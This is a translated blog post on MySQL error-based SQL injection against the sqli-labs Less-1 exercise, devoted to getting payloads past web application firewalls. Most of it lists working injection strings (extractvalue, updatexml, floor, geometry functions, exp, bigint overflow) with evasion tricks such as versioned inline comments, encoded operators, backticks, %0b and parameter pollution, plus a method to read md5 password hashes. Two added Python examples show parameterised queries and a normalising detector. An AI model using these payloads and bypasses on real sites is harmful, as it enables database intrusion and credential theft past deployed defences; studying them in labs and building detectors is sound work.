SQL injection talk (II): error-based injection

In fact, error-based injection is very powerful. There are many articles online about error-based injection and its syntax, but very few explain how to get error-based injection past a WAF, so today I have done a small test and will share my own views.

I will share my own error-based injection bypasses based on my own understanding, let's go.

We still work from Less-1 (sqli-labs), and the first statement is the extractvalue one.

I will not go into the principle in detail, but we still have to understand the principle clearly; otherwise we are just using other people's stuff.

The first: http://127.0.0.1/sql/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
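To make the risk on the defender's side concrete, here is an added example (written for this edit, not code from the original post or from sqli-labs). It rebuilds the Less-1 style lookup in two forms over an in-memory SQLite table with constructed rows: the string-concatenated form, where the post's first payload reaches the SQL parser and comes back as a database error (the channel that error-based injection reads from), and the parameterised form, where the same input is only a value that matches no row. The table, the rows and the function names are assumptions made for the example; SQLite stands in for MySQL, so the error text differs, but the mechanism is the same.

```python
import sqlite3

# The post's first payload as the server sees it after URL decoding ("--+" becomes "-- ").
PAYLOAD = "1' and extractvalue(1,concat(0x7e,(select database()),0x7e))-- "


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table (constructed sample rows, not sqli-labs data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_concatenated(conn: sqlite3.Connection, user_input: str):
    """Less-1 style: the input is pasted into the SQL text, so the parser executes it.

    Returns ("ok", username-or-None) or ("error", message) so the caller can see
    that the attacker's text reached the SQL engine.
    """
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % user_input
    try:
        row = conn.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.OperationalError as exc:
        # This error message is exactly what error-based injection extracts data through.
        return ("error", str(exc))


def lookup_parameterized(conn: sqlite3.Connection, user_input: str):
    """Hardened form: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    row = conn.execute(sql, (user_input,)).fetchone()
    return ("ok", row[0] if row else None)


if __name__ == "__main__":
    db = make_db()
    print("concatenated, benign:   ", lookup_concatenated(db, "1"))
    print("concatenated, payload:  ", lookup_concatenated(db, PAYLOAD))
    print("parameterized, benign:  ", lookup_parameterized(db, "1"))
    print("parameterized, payload: ", lookup_parameterized(db, PAYLOAD))
```

With the benign value both forms return the same row. With the payload the concatenated form raises an error from inside the SQL engine, while the parameterised form treats the whole string as the value of id and returns no row. Every bypass in the rest of this post is about reaching that first outcome past a WAF; the second outcome is not reachable by rewriting the payload.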

Now, which sensitive things in it would a WAF filter?

Probably the single quote, and, extractvalue, database.

So we break them down one by one.

(1) and: the first things that come to mind are &, && and %26, i.e. bypassing by encoding; then combine inline comments with the encoding: /*!&&*/, /*!%26%26*/, /*!50000&&*/, /*!50000%26%26*/

This is the payload when and is filtered: 127.0.0.1/sql/Less-1/?id=-1'/*!50000%26%26*/extractvalue(1,concat(0x7e,(select database()),0x7e))--+ // the same goes for or and xor

Every and in error-based injection can be replaced with or or xor, which easily changes its appearance. Ps: we know or = ||, and of course also the single |

(2) Then there is extractvalue; how can we bypass this one?

The first is case variation, extRactvAlue, which does not necessarily work, because a WAF's regular expressions cover every form of the function name.

The second is inline comments, and inline comments work very well: /*!50000%26%26*//*!50000extRactvAlue*/(1,concat(0x7e,(select database()),0x7e))--+

The third is bypassing with special symbols:

  1. /*!50000%26%26*//*!50000`extRactvAlue`*/(1,concat(0x7e,(select database()),0x7e))--+  the backticks help us bypass

  2. /*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select database()),0x7e))--+  bypass using exclamation marks

  3. %0bor%0b(extractvalue(1,concat(0x7e,(select database()),0x7e)))--+  bypass using %0b

  4. /*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select database()),0x7e))/*!50000*/--+  followed by an inline comment

(3) Then database

  For bypassing database, refer to my first article.

(4) Bypassing with HTTP parameter pollution (HPP)

  /*&id=' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+*/ // then we can play around with parameter pollution inside the comment; everyone knows this one

If after all this we still have not got around the WAF, that is normal, haha; next you need to work on the statement as a whole.

(1) The first is the procedure analyse method

  procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)--+ // rand() generates a random number between 0 and 1; friends who remember the rand function will certainly think of the floor error; of course we can also add the methods above on top of this

  procedure%23%0aanalyse(/*!50000`extractvalue`*/(rand(),`concat`(0x3a,database/**/(/*!50000*/))),1)/*!11340*/--+  this bypass uses a combination of punches

  ps: when we look up tables, from information_schema.tables where table_schema='security', we can convert security into hex, because some WAFs are sensitive to their own database and table names. Also, extractvalue and updatexml queries have a length limit: when the password we query is an md5 value, we can query at most 31 characters; if you do not know this you will be stuck, so we need a way to read the md5, for example with updatexml:

and updatexml(1,concat(0x7e,substr((select md5(password) from users limit 1,1),17,32),0x7e),1)--+  17 and 32 are the start position and length taken

(2) Changing functions: besides extractvalue, our error-based injection has other functions, and there are many ways to bypass, so we need to be flexible.

The second: and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+  the floor error. Whichever error function is used, the bypass method follows the extractvalue one; I have summarized it above.

Third: and (updatexml(1,concat(0x7e,(select database()),0x7e),1))--+

Fourth: and geometrycollection((select * from(select * from(select database())a)b))--+ // the fourth to the ninth are all the same, only the function name changes

Fifth: and multipoint((select * from(select * from(select database())a)b))--+

Sixth: and polygon((select * from(select * from(select database())a)b))--+

Seventh: and multipolygon((select * from(select * from(select database())a)b))--+

Eighth: and linestring((select * from(select * from(select database())a)b))--+

Ninth: and multilinestring((select * from(select * from(select database())a)b))--+

ps: I did not give bypass payloads for these functions, because if you read carefully what I wrote about the extractvalue bypass, it applies to the other error functions as well; only the function name changes, and that is the key modification: look at which filtering method the WAF uses for which function. That is the essence of what we are discussing about WAFs.

Tenth: and exp(~(select * from(select database())a))--+ // the exp error can also be used together with the union-based detection of the injection point mentioned earlier; 1-exp(11111) determines the injection point on the same principle

    and !!!`exp`(~(select * from(select database())a))--+ // exp can take backticks

Eleventh: union select (!(select * from(select database())x)-~0),2,3--+ // uses the bigint overflow error; union select can be bypassed too

Twelfth: or 1 group by concat_ws(0x7e,database(),floor(rand(0)*2)) having min(0) or 1--+  a variant of floor
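From the detection side, every bypass in sections (1) to (4) and in the list of functions two to twelve above works because the filter matches the raw text while MySQL sees something else. The added example below (written for this edit, not code from the original post) shows the defender's answer: decode and normalise the parameter value the way MySQL will read it (URL decoding, versioned /*!50000 ... */ comments kept, plain comments dropped, backticks, !!!, %0b, & and | folded away) and only then look for the error-based function names and idioms the post enumerates. It also checks every value of a duplicated parameter so that the HPP trick is not missed. The sample values are constructed from the payload shapes in the post, and the rule and function names are assumptions made for the example; a real WAF would also need the same per-parameter parsing as the backend.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Error-based functions enumerated in the post (constructed list, taken from the page).
ERROR_FUNCTIONS = [
    "extractvalue", "updatexml", "floor", "geometrycollection", "multipoint",
    "polygon", "multipolygon", "linestring", "multilinestring", "exp",
]

# A naive WAF rule, assumed for the example: it matches only the textbook spelling.
NAIVE_RULE = re.compile(r"\b(?:and|or|xor)\s+(?:extractvalue|updatexml|floor)\s*\(", re.I)

# Indicators checked after normalisation: an error-based function call,
# the ~0 bigint-overflow idiom, or a procedure analyse clause.
INDICATORS = re.compile(
    r"\b(?:" + "|".join(ERROR_FUNCTIONS) + r")\s*\(|~\s*0\b|\bprocedure\s+analyse\s*\("
)


def naive_waf_blocks(raw: str) -> bool:
    """The naive rule applied to the raw, still URL-encoded parameter value."""
    return NAIVE_RULE.search(raw) is not None


def normalize(raw: str) -> str:
    """Fold away the obfuscations used in the post so the text resembles what MySQL parses."""
    s = raw
    for _ in range(2):  # %26%26 -> &&, %0b -> \x0b, %23%0a -> #\n, + -> space (double-encoding too)
        s = unquote_plus(s)
    # MySQL executes the body of a versioned comment /*!50000 body */, so keep the body.
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    # Plain block comments and # / -- line comments carry nothing the server executes.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"(?:#|--\s).*", " ", s)
    s = s.replace("`", "")             # backtick-quoted identifiers are still the same identifier
    s = re.sub(r"!+", " ", s)          # !!! is only logical NOT applied to the call's result
    s = re.sub(r"&{1,2}", " and ", s)  # & and && are spellings of and
    s = re.sub(r"\|{1,2}", " or ", s)  # | and || are spellings of or
    return re.sub(r"\s+", " ", s).strip().lower()  # \s also swallows \x0b; then case-fold


def detect(param_value: str) -> bool:
    """Normalise first, then look for the error-based indicators."""
    return INDICATORS.search(normalize(param_value)) is not None


def detect_query_string(query_string: str) -> bool:
    """Check every value of every parameter, so a duplicated id= (HPP) cannot hide the payload."""
    params = parse_qs(query_string.lstrip("?"), keep_blank_values=True)
    return any(detect(value) for values in params.values() for value in values)


# Constructed sample parameter values, following the payload shapes given in the post.
SAMPLES = {
    "textbook": "1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+",
    "encoded_and": "-1'/*!50000%26%26*/extractvalue(1,concat(0x7e,(select database()),0x7e))--+",
    "backtick_bang": "-1'/*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select database()),0x7e))--+",
    "vertical_tab": "-1'%0bor%0b(extractvalue(1,concat(0x7e,(select database()),0x7e)))--+",
    "procedure": "1' procedure%23%0aanalyse(/*!50000`extractvalue`*/(rand(),`concat`(0x3a,database/**/(/*!50000*/))),1)/*!11340*/--+",
    "bigint": "-1' union select (!(select * from(select database())x)-~0),2,3--+",
    "benign": "1",
}
# Constructed HPP query string: the first id= opens a comment, the second carries the payload.
HPP_QUERY_STRING = "id=/*&id=' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+*/"


def verdicts() -> dict:
    """(naive rule, normalised detection) for every constructed sample."""
    return {name: (naive_waf_blocks(v), detect(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, normalised) in verdicts().items():
        print(f"{name:14s} naive={naive!s:5s} normalised={normalised}")
    print("HPP, whole string:", detect(HPP_QUERY_STRING))
    print("HPP, per parameter:", detect_query_string(HPP_QUERY_STRING))
```

Run stand-alone, the naive rule catches only the textbook sample, while normalised detection flags all six obfuscated ones and leaves the benign value alone. The HPP lines make the last point of section (4): normalising the whole query string as one blob removes everything between /* and */ and sees nothing, whereas checking each parameter value separately, as the backend does, finds the payload.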

Of course, my summary is only one-sided; if you want to become stronger, read more articles and the MySQL manual, and keep learning for life.


Source: www.cnblogs.com/xinxin999/p/12523887.html